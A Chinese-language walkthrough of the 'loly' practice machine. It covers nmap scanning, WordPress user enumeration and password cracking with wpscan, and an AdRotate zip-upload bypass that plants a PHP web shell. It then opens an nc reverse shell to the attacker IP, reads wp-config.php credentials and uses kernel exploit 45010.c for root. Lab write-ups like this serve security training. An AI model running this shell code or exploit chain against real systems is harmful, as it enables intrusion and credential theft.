前言

• 挑战攻克该靶机30分钟

靶机：loly靶机，IP地址为192.168.10.11

攻击：kali，IP地址为192.168.10.6

靶机和攻击机都采用VMware虚拟机，都采用桥接网卡模式

文章涉及的靶机及工具，都可以自行访问官网或者项目地址进行获取，或者通过网盘链接下载 https://pan.quark.cn/s/a795145e3869

主机发现

也就是相当于现实环境中去发现确定主机的ip地址，因为这里是靶机环境，所以跳过了从域名到ip地址的过程。

使用arp-scan -l或者netdiscovery -r 192.168.10.1/24

当然也可以使用nmap等工具进行

arp-scan -l

信息收集

使用nmap扫描目标端口等信息

首先扫描目标的tcp端口的开放情况

nmap -sT --min-rate=1000 192.168.10.11 -p- -oA nmap-tcp

再扫描udp端口的开放情况

nmap -sU --min-rate=1000 192.168.10.11 --top-ports 20 -oA nmap-udp

可以看到明确开放的udp端口没有，所以下面对tcp端口进行一个筛选，这里因为22端口并不是明确closed的，是filtered的，所以也要包括在内

ports=`grep /tcp nmap-tcp.nmap | awk -F'/' '{print $1}' | paste -sd ','`

进一步对这些端口进行服务、系统等探测

nmap -sV -O -sC 192.168.10.11 -p $ports --min-rate=1000

再使用nmap的漏洞检测脚本对这些端口进行探测

nmap --script=vuln 192.168.10.11 -p $ports

枚举出的目录，可能是wordpress的CMS

网站信息探测

访问80端口的界面，是nginx安装后的默认界面，页面源代码没有信息泄露

使用whatweb或者浏览器插件wappalyzer进行查看相关配置

whatweb http://192.168.10.11 -v

使用gobuster等目录爆破工具进行测试

gobuster dir -u http://192.168.10.11 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -b 404 -x php,html,txt,md,zip

访问wordpress，可以看到，很是杂乱，这个不用说了吧，一般可能都需要绑定域名了

随便点击一个链接，可以发现指向的域名loly.lc，或者自己去查看页面源代码

绑定域名，采用静态文件hosts，计算机会优先去查看这个文件中的解析对应。

在linux系统中，文件在/etc/hosts，windows系统，文件在C:\Windows\System32\Drivers\etc\hosts

这里使用的是kali，所以修改/etc/hosts文件

再次访问，可以发现，解析成功

wordpress探测

使用whatweb进一步探测，发现wordpress的版本信息

whatweb http://192.168.10.11/wordpress -v

那么下一步，使用针对wordpress的工具wpscan

wpscan --url http://192.168.10.11/wordpress -e u

枚举出用户，进一步进行密码破解

wpscan --url http://192.168.10.11/wordpress -U loly -P /usr/share/wordlists/rockyou.txt

用户名loly和密码fernando

文件上传

在登录后，经过多方测试，最终在插件AdRotate中，找到一个文件上传的测试点，并且在寻找的时候，也发现在相关设置中有文件上传后的地址，很清晰了，只是文件上传的种种需要多方测试

首先就是简单的测试：

1. 直接上传php，不行
2. 修改后缀名再上传，不行。
3. 后缀名出以shell.php.jpg，生成图片马。不行
4. 双写php以及大小写php，不行
5. 更改mime类型，不行
6. 以图片的形式上传，不解析为php
7. 无法上传.htaccess文件，无法修改解析

根据上面，测试其他的几种，也就是js,html,zip

1. html类型，不解析为php，所以不行
2. js类型，显示源代码，也不解析，不行
3. 以zip压缩后的文件，可以，并成功解析

只是上传为zip文件，访问的时候以php访问。如

info.php.zip，访问的时候为info.php

这里注意一点，采用linxu中的zip压缩工具，不要使用windows压缩，不一样

echo "<?php phpinfo();?>" > info.phpzip -r -o info.php.zip info.php 

我也测试过，把压缩包的数据进行抓包然后截取，但是不行。所以我放弃使用windows上传这个脚本了

那么编写一个代码，以可以命令执行

echo '<?php system($_GET["loly"]);?>' > shell.php
zip -r -o shell.php.zip shell.php

上传后，访问即可，构造shell.php?loly=ls，即可发现

构造反弹shell代码，首先在kali开启监听，然后再使用下面代码

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc 192.168.10.6 9999 >/tmp/f
#进行url编码
rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7Cbash%20-i%202%3E%261%7Cnc%20192.168.10.6%209999%20%3E%2Ftmp%2Ff

靶机内信息收集

既然有wordpress，那么就一定要看看其配置文件wp-config.php

获取用户名wordpress和密码lolyisabeautifulgirl

查看网络状态

ss -antulp

发现3306开放，可能就是mysql，以前面的登录测试，登录之前，先测试安装什么版本的python

dpkg -l | grep python
#加一层shell
python3 -c 'import pty;pty.spawn("/bin/bash")'

数据库中只有一个用户名和密码，与前面枚举出的一样

继续探测信息，首先知道两个密码。fernando和lolyisabeautifulgirl

查看当前系统用户，发现只有loly一个

使用find寻找具有SUID权限的文件，发现sudo和su

find / -perm -4000 -print 2>/dev/null

sudo -l测试，需要密码

尝试使用两个密码，测试loly，是否存在多用的情况

成功了，以lolyisabeautifulgirl登录

再次使用sudo -l，没有文件给loly使用。

收集内核版本等信息

uname -a
uname -r
cat /etc/issue
cat /etc/*release
lsb_release

当然，后面其实还有脚本上传进行检测，不过因为这里搜索到合适的提权脚本，并且可以使用，所以不上传脚本了

提权

使用gcc -v确定靶机安装了gcc

使用searchsploit搜索到可利用的漏洞

searchsploit 4.4.0-31 ubuntu Privilege

根据内核版本和系统信息，这些都是可以测试的，先测试第二个45010.c

#把脚本下载到当前目录下
searchsploit -m 45010.c

然后查看脚本

在kali使用python开启监听，然后靶机使用wget下载即可

#kali执行
python3 -m http.server 1234#靶机执行
wget http://192.168.10.6:1234/45010.c

这里在loly的主目录，因为他有一个脚本，可能会定期清理/tmp目录，我也不想再更改脚本，省时间

靶机执行脚本中编译和执行即可

gcc 45010.c -o exp
chmod +x exp
./exp

对应其他的脚本能否提权，自己去试试，一定要动手测试，积累经验

总结

该靶机的考察主要就是从web到内网

1. 网站主流CMS的识别
2. wpscan的使用，当然爆破也可以使用其他工具，如burp等，不过这个工具是专门针对wordpress，所以，建议使用
3. 文件上传如何绕过检测，这里应该是利用对于压缩包的一个解析漏洞，导致执行了php代码
4. wordpress的配置文件要清楚
5. 靶机内的信息收集，内核等信息